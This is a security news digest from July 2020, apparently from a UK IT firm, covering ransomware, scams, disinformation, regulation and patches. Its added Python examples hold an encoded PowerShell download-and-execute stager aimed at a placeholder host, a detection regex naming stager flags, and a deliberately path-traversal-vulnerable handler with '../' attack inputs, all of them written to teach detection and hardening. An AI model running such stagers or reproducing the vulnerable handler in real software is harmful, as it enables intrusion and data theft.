FFT news digest July 31 2020

Ransomware

There are mixed messages about the risk of ransomware, with some reports saying this year has seen a decline in successful attacks, but our view is that it remains a clear, present and increasing danger. The latest high-profile victim is GPS and fitness company Garmin, which is now recovering from "a cyber-attack that encrypted" some of its systems. (At the time of writing, some services remain limited.) Ransomware is an easy way for criminals to make money and every organisation is likely to experience an attempted attack at some stage. ZDNet has a blow-by-blow account of one incident which affected a food and drink manufacturer. The key lesson is that this attack was not particularly sophisticated. It used the tried and tested weapon of a Microsoft Word document labelled as an invoice. Once opened, the document launched a PowerShell command. Ordinary users have no need to run such commands, and a Word document has no business starting PowerShell at all: blocking Office applications from launching child processes, and restricting what PowerShell can do for standard users, would have stopped this attack at that step. (Simply setting PowerShell's "execution policy" is not enough; it is a convenience setting, not a security boundary, and attackers bypass it routinely.) As always, look after the basics and the basics will look after you.
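
The chain in that account, an Office document starting PowerShell, is also one of the easiest things to spot in endpoint telemetry. The Python below is an added example, not code from the ZDNet report or from any vendor involved: it runs over a handful of constructed process-creation events (laid out in the style of Sysmon Event ID 1, flattened to key=value fields, made up for this page), flags an Office parent spawning a shell, and decodes any -EncodedCommand payload so an analyst can read what the document actually ran. The file paths, the example.invalid URL and the field layout are all assumptions.

```python
"""Flag PowerShell (or another shell) launched from an Office document.

Added example, not from the ZDNet write-up or from any real system: the
sample events below are constructed in the style of Sysmon Event ID 1
(process creation) exported as key=value fields separated by '|'.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Hallmarks of the usual macro -> PowerShell download-and-execute stager.
SUSPICIOUS = re.compile(
    r"-e(nc(odedcommand)?)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|"
    r"bypass|downloadstring|downloadfile|iex\b|invoke-expression|frombase64string",
    re.IGNORECASE,
)

# Constructed stager text, encoded the way PowerShell expects for
# -EncodedCommand (base64 over UTF-16LE). example.invalid is a reserved name.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 1. Word spawning hidden, encoded PowerShell: the chain in the story.
    rf"ParentImage={OFFICE_DIR}\WINWORD.EXE|Image={PS}|CommandLine=powershell.exe -nop -w hidden -enc " + ENCODED,
    # 2. Legitimate admin script launched from Explorer: must not fire.
    rf"ParentImage=C:\Windows\explorer.exe|Image={PS}|CommandLine=powershell.exe -File C:\Scripts\backup.ps1",
    # 3. Excel going via cmd.exe first: the Office -> shell edge is still visible.
    rf"ParentImage={OFFICE_DIR}\EXCEL.EXE|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\Users\Public\inv.ps1",
    # 4. Benign.
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe invoice.txt",
]


@dataclass
class Finding:
    parent: str
    child: str
    reasons: list
    decoded: str  # plaintext behind -EncodedCommand, "" if none


def parse_event(line):
    """Split 'Key=value|Key=value' into a dict; partition keeps '=' inside values
    (base64 padding). Real exports should be read as EVTX/JSON, not split on '|'."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext behind -e/-enc/-EncodedCommand, or "" if absent or undecodable."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(events):
    """Return a Finding for each event that looks like the Office -> shell chain."""
    findings = []
    for line in events:
        ev = parse_event(line)
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        decoded = decode_encoded_command(cmd)
        reasons = []
        # Rule 1: a document editor has no business spawning a shell at all.
        if parent in OFFICE_PARENTS and child in SHELLS:
            reasons.append(f"{parent} spawned {child}")
        # Rule 2: stager flags on the visible command line or inside the decoded blob.
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd + " " + decoded)})
        if child in SHELLS and hits:
            reasons.append("stager flags: " + ", ".join(hits))
        if reasons:
            findings.append(Finding(parent, child, reasons, decoded))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.parent} -> {f.child}: {'; '.join(f.reasons)}")
        if f.decoded:
            print("    decoded:", f.decoded)
```

Event 2 is the control: an administrator running a script from Explorer is not flagged, because neither rule fires. The same parent-child edge that rule 1 detects is what Microsoft Defender's attack surface reduction rule "Block all Office applications from creating child processes" prevents outright, which is a more durable fix than trying to remove PowerShell from the machine.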

Scumwatch

Skype: Attack uses an automated invoice notification with a link to the supposed bill. Clicking on the link opens a fake Microsoft sign-in page in a bid to steal credentials. Abnormal Security

TV licence: Scammers aren't about to pass up the ideal opportunity presented by the end of free licences for over-75s. There's a blizzard of fake emails doing the rounds and some elderly people have lost tens of thousands of pounds as a result of falling for them. Moneywise

Netflix: Attempts to steal payment card details and credentials begin by sending victims to a working CAPTCHA page. The CAPTCHA isn't there to stop bots in the usual sense: the automated link scanners in email security products can't solve it, so they never see the phishing page behind it. (CAPTCHAs are those irritating puzzles that supposedly prove we're human.) Armorblox

PayPal: Upsurge in fake PayPal emails saying the recipient's account has been "limited" as a result of a policy violation. Action Fraud

Emotet: After five months of slumber, the malicious software botnet has re-emerged with some clever tricks, including using stolen email attachments to make its messages look more authentic. Basic precautions are essential to reduce the risk of being affected. (Botnets are networks of compromised devices used for nefarious purposes.) Bleeping Computer

Mac malware: North Korea is blamed for four distinct families of malicious software designed to attack macOS devices. Researchers say those responsible are "deeply invested in writing custom malware for Apple's platform". SentinelOne

Android: A slew of malicious photo apps flood devices with random ads rather than doing what they promise. They also evade detection by making their icons disappear from the home screen. As always, we advise extreme caution when installing apps from the Google Play Store. White Ops

Top Ten: UK Finance rounds up the top COVID-19 related scams, including some of the above as well as fake council tax reductions and test and trace notifications. Action Fraud

Disinfo dissected

Analysis of a three-year campaign provides a detailed view of the tactics used to spread disinformation. Dubbed Ghostwriter, the campaign analysed by FireEye mainly targets audiences in Lithuania, Latvia and Poland and is aligned to Russian interests. Compromised websites and spoofed email accounts were used to distribute fake content with anti-NATO and anti-US themes. FireEye says at least 14 fake online identities were created to pose as journalists and analysts in a "concerted and ongoing influence campaign". A variety of tactics have been used, but each operation starts by creating a falsified narrative and fabricated content, including made-up quotes and modified images. In many cases, compromised websites, including news outlets, were exploited to publish fake news or documentation which in some cases replaced genuine content. This campaign targeted Eastern Europe but, as FireEye warns, it could easily be repurposed in the run-up to crucial US elections.

Tech titans testify

You're a lawmaker and you have the leaders of four of the most powerful tech companies in the world in front of you. What do you ask them? Well, if you're Republican Congressman Greg Steube of Florida, you take the chance to ask (repeatedly) why your fundraising emails have ended up in spam. This week's House Judiciary Committee hearing was designed to put the CEOs of Amazon, Facebook, Google and Apple on the spot. It occasionally managed to do that, bringing up anti-competitive data use (Amazon), anti-competitive acquisitions (Facebook), anti-competitive app policies (Apple) and anti-competitive search algorithms (Google). But the hearing (over five hours of it) was full of sound, littered with interruptions and limited on substance. It was the culmination of a 13-month investigation into the tech giants and a report is due to be released soon. It's just one of multiple probes in the US (not to mention reviews in Europe). The road to increased regulation is far from straight, but the tech industry's wild west days are coming to an end.

Transatlantic data transfers

The European Data Protection Board has published guidance following the decision of Europe's top court to strike down the EU-US Privacy Shield, a key mechanism underpinning transfers of personal data to the US. The main impact for organisations is the need to carry out a risk assessment "as to whether Standard Contractual Clauses provide enough protection within the local legal framework." The board advises that "the receiver of the data may be able to assist." In reality, the nature of US surveillance legislation means any honest assessment is likely to find there's a problem. The board says it's analysing the Court's judgment to determine the kind of supplementary measures that could provide sufficient protections. Meanwhile, organisations should "take stock of the international transfers you make and react promptly as guidance and advice becomes available". In the UK, the Information Commissioner's Office has confirmed the board's guidance applies to British controllers and processors.

Safe sign ups

It's good practice to use a different email address for each online service you sign up to, but repeatedly creating email accounts is too much trouble for most of us. Using a unique address means that if an organisation loses your details, only that address is exposed, and you can tell exactly who lost it. To make it easier to do the right thing, Firefox has created a service called Relay which does the hard work for you. It's currently in beta, but signups are being processed relatively quickly. It works by creating an alias that forwards any messages to your normal email address, so the organisation never sees your real one. Used together with a password manager, Firefox Relay makes a breach at any one service far less damaging (it will also identify organisations that have failed to protect your data). One other measure worth considering is to give made-up answers when you're asked for memorable information such as a mother's maiden name, and store the made-up details in the password manager.

In brief

Twitter breach: "Phone spear phishing" was responsible for this month's calamitous security failure, according to Twitter's latest update. Targeted messages and calls aimed at stealing credentials are increasingly common and we've seen them used against several high-profile clients. Twitter's account provides a clear outline of how these attacks work.

OKCupid: Multiple security issues could reveal complete profiles, private messages and personal addresses. The value of the data in dating apps is pretty obvious, so it's no surprise the information is catnip to criminals. The problems have been addressed, but frankly these apps should carry a health warning. Check Point

CCleaner: Microsoft is now detecting the widely-used Windows utility as a 'potentially unwanted application'. It blames the developer for bundling other applications with the installer. Bleeping Computer

BCC: The irony. Newsletter platform Substack announced a new privacy policy but did so by sending its email to around 500 recipients with every address visible to all of them, rather than using BCC (thus revealing the addresses of senior figures in the Trump administration and major corporations, among others). The Register

SSDs: As the price of solid state drives falls and usage increases, it's worth remembering that they don't last forever. The research cited suggests the storage cells in the memory chips give up the ghost after five to ten years, but wear is driven by how much data is written rather than by the calendar, so a drive's rated endurance (the total bytes written figure on its datasheet) and its SMART wear indicators are the things to watch. Either way, the answer is the same as for any drive: keep backups. CBR

Smartphone personality: The way we use our smartphones can predict four key personality traits. Researchers said openness to experience, conscientiousness, extroversion and emotional stability could all be estimated. Their paper is interesting and ever so slightly terrifying. PNAS

Updates

Dell: Update to address a path traversal vulnerability in PowerEdge servers. Path traversal means the software builds a file path from user-supplied input without checking where that path ends up, so a request containing "../" sequences can reach files and folders outside the area the requester is meant to see. Here that means someone logged in as an ordinary user could read content that should not be accessible to them.
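
To make that concrete, here is the bug class in miniature. The Python below is an added example, not Dell's code: a toy "download a log file" handler in its vulnerable form beside a hardened one, exercised against a throwaway directory the script creates for itself (the folder layout, file names and attack strings are made up for this page).

```python
"""Path traversal, in miniature: a toy 'download a log file' handler.

Added example, not Dell's code. build_fixture() creates a throwaway
directory tree so the script runs offline; names are made up for this page.
"""
import os
import tempfile


def build_fixture():
    """Return (base, logs): logs/app.log is allowed, base/secret.txt is not."""
    base = tempfile.mkdtemp()
    logs = os.path.join(base, "logs")
    os.mkdir(logs)
    with open(os.path.join(logs, "app.log"), "w") as f:
        f.write("ordinary log line\n")
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("admin only\n")
    # A symlink inside the allowed folder that points outside it: a check on
    # the string the user sent passes this, a check on the resolved path does not.
    os.symlink(os.path.join(base, "secret.txt"), os.path.join(logs, "latest.log"))
    return base, logs


def read_log_vulnerable(logs_dir, name):
    """Trusts the caller-supplied name: '..' walks upwards, and os.path.join
    throws logs_dir away entirely if name is an absolute path."""
    with open(os.path.join(logs_dir, name)) as f:
        return f.read()


def read_log_hardened(logs_dir, name):
    """Resolve the final path ('..' collapsed, symlinks followed) and refuse
    anything that does not stay inside logs_dir."""
    root = os.path.realpath(logs_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"refused: {name!r} resolves to {target}, outside {root}")
    if not os.path.isfile(target):
        raise FileNotFoundError(name)
    with open(target) as f:
        return f.read()


def attack_names(base):
    """Requests a client could send. The third looks like it stays under logs/;
    the fourth names a file that genuinely is in logs/, but is a symlink."""
    return [
        "../secret.txt",                   # classic dot-dot
        os.path.join(base, "secret.txt"),  # absolute path swallows the prefix
        "../logs/../secret.txt",           # wanders out and back before leaving
        "latest.log",                      # symlink planted inside the folder
    ]


def demo():
    """Run every attack against both handlers and report what each did."""
    base, logs = build_fixture()
    report = {
        "legit_vulnerable": read_log_vulnerable(logs, "app.log"),
        "legit_hardened": read_log_hardened(logs, "app.log"),
        "vulnerable_leaked": [],
        "hardened_refused": [],
    }
    for name in attack_names(base):
        report["vulnerable_leaked"].append(read_log_vulnerable(logs, name).strip())
        try:
            read_log_hardened(logs, name)
            report["hardened_refused"].append(False)
        except PermissionError:
            report["hardened_refused"].append(True)
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two details matter in the hardened version: the containment check runs on the fully resolved path (after any URL decoding the web layer does, and after symlinks are followed), not on the string the client sent, and the comparison uses the whole path component (commonpath) rather than a startswith() test, which "/srv/logs" would pass for "/srv/logs-private". On Windows, commonpath raises ValueError when the paths are on different drives; treat that as a refusal too.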

Mozilla: Security updates for Firefox, Firefox ESR, and Thunderbird. Vulnerabilities could be exploited to take control of an affected system.

WordPress: Ensure the wpDiscuz plugin has been updated to version 7.0.5 or higher, which fixes a flaw that could allow an attacker to run code on the web server remotely.

Cisco: Update to address an extraordinarily dangerous issue in Data Center Network Manager (DCNM). An unauthenticated attacker who can reach the management web interface could skip the login and act as an administrator, which is one more reason that interface should never be exposed to the internet.

SecureDrop: Version 1.5.0 has security and usability updates.

Tails: As developers put it, version 4.9 fixes "many" security issues.

Routers: Yet more security issues in D-Link and Netgear routers. Some of the devices have reached "end of life", which means no patches are likely. If that's the case, the only safe option is to replace them.

Magento: Security updates for Magento Commerce 2 and Magento Open Source 2.

Zimbra: Multiple security fixes in 9.0.0 “Kepler” Patch 5 and 8.8.15 “James Prescott Joule” Patch 12.


Address

152-160 City Road
London, EC1V 2NX

Contacts
Email: info@fullframetech.com
Phone: +44 (0) 20 3290 2205
Support: +44 (0) 20 3290 2207

Company registration no. 10243217